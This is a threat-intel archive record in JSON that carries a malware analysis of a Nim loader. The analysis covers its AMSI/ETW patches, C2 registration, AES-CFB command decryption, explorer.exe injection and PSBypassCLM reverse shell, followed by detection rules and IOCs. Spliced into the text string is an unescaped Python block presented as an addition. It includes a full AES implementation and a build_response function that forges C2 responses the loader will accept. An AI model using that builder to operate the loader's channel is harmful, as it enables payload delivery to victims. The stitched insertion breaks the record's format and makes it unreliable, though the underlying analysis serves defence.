{
	"id": "59cda0dd-99e6-4a0d-9fe5-b81f5a49f3d6",
	"created_at": "2026-04-06T00:07:13.510695Z",
	"updated_at": "2026-04-10T03:21:13.45127Z",
	"deleted_at": null,
	"sha1_hash": "7f3a23472ef93cda8fb35fcab2a197802dbcca93",
	"title": "Unknown Nim Loader using PSBypassCLM",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1930885,
	"plain_text": "Unknown Nim Loader using PSBypassCLM\r\nBy Jason Reaves\r\nPublished: 2024-03-05 · Archived: 2026-04-05 22:23:23 UTC\r\nBy: Jason Reaves and Joshua Platt\r\nWhile investigating a range of known bad IPs related to another malware I stumbled upon some very odd looking IP addresses. Using the TLS certificate I started backtracking from domain to related malware samples in VirusTotal[1] which led to a loader that is based on NIM[2].\r\nAfter unpacking the malware, the main code block contains an AmsiScanBuffer patch followed by an EtwEventWrite patch.\r\nhttps://medium.com/walmartglobaltech/unknown-nim-loader-using-psbypassclm-cafdf0e0f5cd\r\nPage 1 of 16\n\nThe AmsiScanBuffer patch matches up with the proof of concept code that was released[3,4].\r\nThe patch:\r\nEtwEventWrite patch[5]:\r\nAfterwards the malware begins communication with the C2, first by performing a register request:\r\nThe response it is expecting is JSON data with an ‘id’ key.
The error message in the malware alludes to it being known internally as a ‘node id’.\r\nHTTP/1.1 200 OK\r\nServer: nginx/1.25.2\r\nDate: Sat, 16 Sep 2023 09:56:42 GMT\r\nContent-Type: application/json\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\n{\"id\":\"2cee1125-3252-42d3-8c07-a66456e0ca4b\"}\r\nThis id value is a GUID which is then appended to the hardcoded URI ‘/update/’ at the same C2 location:\r\nThe response from this request is also JSON and is expected to have a ‘commands’ key.\r\nHTTP/1.1 200 OK\r\nServer: nginx/1.25.2\r\nDate: Sat, 16 Sep 2023 09:57:27 GMT\r\nContent-Type: application/json\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\n{\"status\":\"ok\",\"commands\":[\"{\\\"ct\\\": \\\"5sh5kMScmL2Hwz4\\/ysyKOus\\/9QXG8svokJi78biMXp\\/PmHVdT9AtrR9AhqC\r\nThe next thing accessed is the ‘ct’ and ‘iv’ keys from the JSON blob. The ‘ct’ is the AES encrypted payload while the ‘iv’ is the IV needed for the decryption. Note that each element of ‘commands’ is itself a JSON-encoded string (hence the escaped quotes in the capture above), so the loader has to parse that inner string as JSON before it can read the two keys.\r\nThe node id gets reused here and passed to a function performing a SHA256 on the parameter.
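What follows is an added example, not code from the original post or from the malware: a stand-alone Python 3 decryptor for this command channel that performs the SHA-256 key derivation just described together with the base64 decoding and AES-CFB decryption covered next, then strips the ‘update:’ prefix and base64-decodes the payload. It carries its own AES (FIPS-197, any key size) so it runs offline without PyCryptodome, it accepts a ciphertext that is not a multiple of 16 bytes the way CFB natively allows instead of zero-padding it, and, because the real ‘ct’ is truncated on the page, it builds a constructed server response to decrypt: the node id and the 16-byte decoded iv are the values from this capture, while the payload is a constructed stand-in for the delivered DLL layer.

```python
# Added example (not the post's or the malware's code); standard library only.
import base64, hashlib, json

def _xtime(a):
    # Multiply by x in GF(2^8) modulo the AES polynomial (0x11b).
    a *= 2
    return (a ^ 0x11b) if a & 0x100 else a

def _build_sbox():
    # Derive the S-box rather than typing the table: inverse via a log table
    # (3 generates GF(2^8)*), then the affine map. S(0x00)=0x63, S(0x53)=0xed.
    exp = [1]
    for _ in range(254):
        exp.append(exp[-1] ^ _xtime(exp[-1]))      # times 3 = times (x + 1)
    inv = [0] * 256
    for i, v in enumerate(exp):
        inv[v] = exp[(255 - i) % 255]
    sbox = []
    for x in range(256):
        b = s = inv[x]
        for _ in range(4):
            b = ((b << 1) | (b >> 7)) & 0xff
            s ^= b
        sbox.append(s ^ 0x63)
    return bytes(sbox)

SBOX = _build_sbox()

def expand_key(key):
    # FIPS-197 key schedule; nk = 4/6/8 words for AES-128/192/256 (SHA-256 gives AES-256).
    nk = len(key) // 4
    nr = nk + 6
    w = [list(key[i:i + 4]) for i in range(0, len(key), 4)]
    rcon = 1
    for i in range(nk, 4 * (nr + 1)):
        t = list(w[i - 1])
        if i % nk == 0:
            t = [SBOX[b] for b in t[1:] + t[:1]]   # SubWord(RotWord(t)) ^ Rcon
            t[0] ^= rcon
            rcon = _xtime(rcon)
        elif nk > 6 and i % nk == 4:
            t = [SBOX[b] for b in t]
        w.append([a ^ b for a, b in zip(w[i - nk], t)])
    return [sum(w[4 * r:4 * r + 4], []) for r in range(nr + 1)]

def encrypt_block(round_keys, block):
    # One AES block encryption; the 16-byte state is kept in column-major order.
    nr = len(round_keys) - 1
    s = [b ^ k for b, k in zip(block, round_keys[0])]
    for rnd in range(1, nr + 1):
        s = [SBOX[b] for b in s]                                             # SubBytes
        s = [s[4 * ((c + r) % 4) + r] for c in range(4) for r in range(4)]  # ShiftRows
        if rnd != nr:                                                        # MixColumns
            mixed = []
            for c in range(4):
                col = s[4 * c:4 * c + 4]
                for r in range(4):
                    a0, a1, a2, a3 = (col[(r + k) % 4] for k in range(4))
                    mixed.append(_xtime(a0) ^ _xtime(a1) ^ a1 ^ a2 ^ a3)
            s = mixed
        s = [b ^ k for b, k in zip(s, round_keys[rnd])]                      # AddRoundKey
    return bytes(s)

def aes_cfb128(key, iv, data, decrypt):
    # CFB with 128-bit segments (segment_size=128 in the page's PyCryptodome call). CFB only
    # runs the cipher forward, so one routine serves both directions, and a trailing partial
    # block is just XORed with keystream: no padding needed, unlike the session on the page.
    rks = expand_key(key)
    out, feedback = bytearray(), bytes(iv)
    for i in range(0, len(data), 16):
        chunk = data[i:i + 16]
        produced = bytes(a ^ b for a, b in zip(chunk, encrypt_block(rks, feedback)))
        out += produced
        feedback = chunk if decrypt else produced
    return bytes(out)

def derive_key(node_id):
    # The loader keys AES with SHA-256 of the node id handed out by /register.
    return hashlib.sha256(node_id.encode()).digest()

def decrypt_command(node_id, command_json):
    # One element of the commands list: itself a JSON string carrying base64 ct and iv.
    cmd = json.loads(command_json)
    plaintext = aes_cfb128(derive_key(node_id), base64.b64decode(cmd['iv']),
                           base64.b64decode(cmd['ct']), decrypt=True)
    verb, _, body = plaintext.partition(b':')   # update:<base64 of the payload>
    return verb.decode(), base64.b64decode(body)

def decrypt_response(node_id, response_body):
    # The /update/<id> body: a status plus a list of JSON-string commands.
    return [decrypt_command(node_id, c) for c in json.loads(response_body)['commands']]

NODE_ID = '2cee1125-3252-42d3-8c07-a66456e0ca4b'  # node id from the capture on the page
IV = b'AAAAAAAAAAAAAAAA'                           # decoded iv shown in the page's session
PAYLOAD = b'MZ' + bytes(range(60))                 # constructed stand-in for the delivered layer

def build_response(node_id=NODE_ID, iv=IV, payload=PAYLOAD):
    # Constructed server side: what the C2 has to send for the loader to accept it.
    ct = aes_cfb128(derive_key(node_id), iv, b'update:' + base64.b64encode(payload), decrypt=False)
    command = json.dumps({'ct': base64.b64encode(ct).decode(), 'iv': base64.b64encode(iv).decode()})
    return json.dumps({'status': 'ok', 'commands': [command]})
```

Call decrypt_response(node_id, body) with the node id from the /register reply and the body of a real /update/<id> response; the constructed plaintext above is 91 bytes long, the same 11-byte remainder as the sample on the page, so the partial-block path is exercised. Before trusting output from a live sample, check the cipher core against the FIPS-197 vectors (AES-128 and AES-256 on the 00112233…ff block), which is the cheapest way to catch a transcription error in a hand-rolled AES.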
Afterwards the data from ‘ct’ and ‘iv’ are base64 decoded:\r\nAll of this is preparation for performing AES-CFB on the base64 decoded data: the SHA256 hash of the node id is the key (32 bytes, so AES-256) and the iv sent with the payload is the IV.\r\nWe can recreate this in Python to prove it out (a Python 2 session; the imports it relies on are added here, and iv and ct_cmd hold the decoded ‘iv’ and the raw base64 ‘ct’ string from the command):\r\n\u003e\u003e\u003e import base64, hashlib\r\n\u003e\u003e\u003e from Crypto.Cipher import AES\r\n\u003e\u003e\u003e h = hashlib.sha256('2cee1125-3252-42d3-8c07-a66456e0ca4b').digest()\r\n\u003e\u003e\u003e h\r\n'p\\x07\\x9c\\xa2\\x0b\\xeadD\"\\xe5\\xa4\\x18\\xbf-]I\\x07\\xb1\\xa3\\x98`=:\\xe1\\x93\\xa8k\\xfa\\xaa\\x81\\xa9\\xa3'\r\n\u003e\u003e\u003e iv\r\n'AAAAAAAAAAAAAAAA'\r\n\u003e\u003e\u003e b = base64.b64decode(ct_cmd)\r\n\u003e\u003e\u003e aes = AES.new(h, AES.MODE_CFB, iv, segment_size=128)\r\n\u003e\u003e\u003e t = aes.decrypt(b)\r\nTraceback (most recent call last):\r\n File \"\u003cstdin\u003e\", line 1, in \u003cmodule\u003e\r\n File \"/usr/lib/python2.7/dist-packages/Crypto/Cipher/blockalgo.py\", line 295, in decrypt\r\n return self._cipher.decrypt(ciphertext)\r\nValueError: Input strings must be a multiple of the segment size 16 in length\r\n\u003e\u003e\u003e t = aes.decrypt(b[:-11])\r\n\u003e\u003e\u003e t[:1000]\r\n'update:6GOWDwBjlg8Aa87i8Y2iO3y0Bex0/H+oxk5mGRfH4AhW63/ykuMoMgYAAAAAaCgdAClC6MBko43V6qTWVcX/PccNj1aWG\r\n\u003e\u003e\u003e t[-100:]\r\n'Uj/wooBhMB16w++AQ++CivBw+sZRIoCRYTAdBdBgMggDCBBOsB1DEj/wUj/wooBhMB14Q++AQ++CivBw0lMaVVHRDkrcmV1TDRKS\r\n\u003e\u003e\u003e aes = AES.new(h, AES.MODE_CFB, iv, segment_size=128)\r\n\u003e\u003e\u003e t = aes.decrypt(b+'\\x00'*5)\r\n\u003e\u003e\u003e t[-100:]\r\n'Q++CivBw+sZRIoCRYTAdBdBgMggDCBBOsB1DEj/wUj/wooBhMB14Q++AQ++CivBw0lMaVVHRDkrcmV1TDRKSkJUenpLbw==\\xe5\\\r\nThe ciphertext is 11 bytes short of a 16-byte boundary, which is why PyCryptodome refuses it with segment_size=128. Because CFB only ever runs the block cipher forward and each keystream block depends only on the previous ciphertext block, padding the ciphertext out to the boundary with null bytes leaves the real plaintext bytes intact; the five trailing output bytes (the \\xe5... after the closing == above) are garbage produced by the padding and are simply discarded.\r\nAfter decryption the malware will base64 decode the data after ‘update:’, which is a bytecode wrapped layer around a DLL. The loader in this case will inject the decoded data into a hardcoded process name, in this case ‘explorer.exe’.\r\nPayload Delivered\r\nWe went through a number of deliveries that we were able to find but they all seemed to be the same thing, a NIM coded DLL with a copy of PsBypassCLM.exe[6] embedded inside. The NIM coded portion had a source code file named:\r\n/root/mounted_app/execute_powershell.nim\r\nMain function also referred to as ‘executepowershell’:\r\nThis piece of the malware will actually talk to the same C2 as the initial loader but using a different URI.\r\nThe response from this is expected to be a JSON blob that contains the keys ‘IP’ and ‘PORT’ which are then used with PsBypassCLM to set up a PowerShell reverse shell[6].\r\nMalware code reuse:\r\nhttps://github.com/treeform/puppy\r\nhttps://github.com/adamsvoboda/nim-loader\r\nhttps://github.com/icyguider/Nimcrypt2\r\nhttps://github.com/padovah4ck/PSByPassCLM\r\nDetections\r\nFor traffic patterns we can find some of the initial loader laid out in this sandbox report[7]. The ‘Puppy’ User-Agent in the requests below is consistent with the puppy HTTP client listed under code reuse, and both requests are plain GETs without a body, so the URI and the User-Agent carry the signal.\r\nLoader registration:\r\nGET /register HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: gzip\r\nUser-Agent: Puppy\r\nHost: dlqqhrmhyuuikbqx.net\r\n$HOME_NET any -\u003e $EXTERNAL_NET any (msg:\"NimLoader Bot Registration\"; content:\"/register\"; http_uri;\r\nLoader requests commands/deliveries:\r\nGET /update/5f04c669-b925-448c-a505-1cbf7653c261 HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: gzip\r\nUser-Agent: Puppy\r\nHost: dlqqhrmhyuuikbqx.net\r\nPS Execute stage check-in (the different URI used by the delivered DLL):\r\n$HOME_NET any -\u003e $EXTERNAL_NET any (msg:\"NimLoader PS Execute Checkin\"; content:\"/ggapi\"; http_uri; c\r\nDelivery response (the response is chunked, so the leading f60 is the chunk size and the signature anchors on the JSON that follows it):\r\nData Raw: 66 36 30 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 63 6f 6d 6d 61 6e 64 73 22 3\r\nData Ascii: f60{\"status\":\"ok\",\"commands\":[\"{\\\"ct\\\": \\\"vYUvh1FpiumH5uObUJ5O9zXTyseRCt7IFDlg4lougkh6YGk\r\n$EXTERNAL_NET any -\u003e $HOME_NET any (msg:\"NimLoader Bot Command Response\"; content:\"|7b227374617475732\r\nIOCs\r\nd0f89958b779.link\r\nqt-x34-api.net\r\n6bb9b4497037.xyz\r\ndlqqhrmhyuuikbqx.net\r\nNim crypted version:\r\nf606620b5cec0edd90cdc97d0ae4552a64ff0642ce0578ca61e8a1753b017bb4\r\nRust crypted version:\r\nb979a029f65b8af43dc3ca9d156b6f3a3392cdc2d8b92f66c70226e86275b8fc\r\nThis version delivers a bytecode version of the loader which also injects into a different hardcoded process:\r\nRuntimeBroker.exe\r\nReferences\r\n1: https://www.virustotal.com/\r\n2: https://nim-lang.org/\r\n3: https://rastamouse.me/memory-patching-amsi-bypass/\r\n4: https://pentestlaboratories.com/2021/05/17/amsi-bypass-methods/\r\n5: https://blog.xpnsec.com/hiding-your-dotnet-etw/\r\n6: https://github.com/padovah4ck/PSByPassCLM\r\n7: https://www.joesandbox.com/analysis/1309411/0/html\r\nSource: https://medium.com/walmartglobaltech/unknown-nim-loader-using-psbypassclm-cafdf0e0f5cd",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://medium.com/walmartglobaltech/unknown-nim-loader-using-psbypassclm-cafdf0e0f5cd"
	],
	"report_names": [
		"unknown-nim-loader-using-psbypassclm-cafdf0e0f5cd"
	],
	"threat_actors": [],
	"ts_created_at": 1775434033,
	"ts_updated_at": 1775791273,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7f3a23472ef93cda8fb35fcab2a197802dbcca93.pdf",
		"text": "https://archive.orkl.eu/7f3a23472ef93cda8fb35fcab2a197802dbcca93.txt",
		"img": "https://archive.orkl.eu/7f3a23472ef93cda8fb35fcab2a197802dbcca93.jpg"
	}
}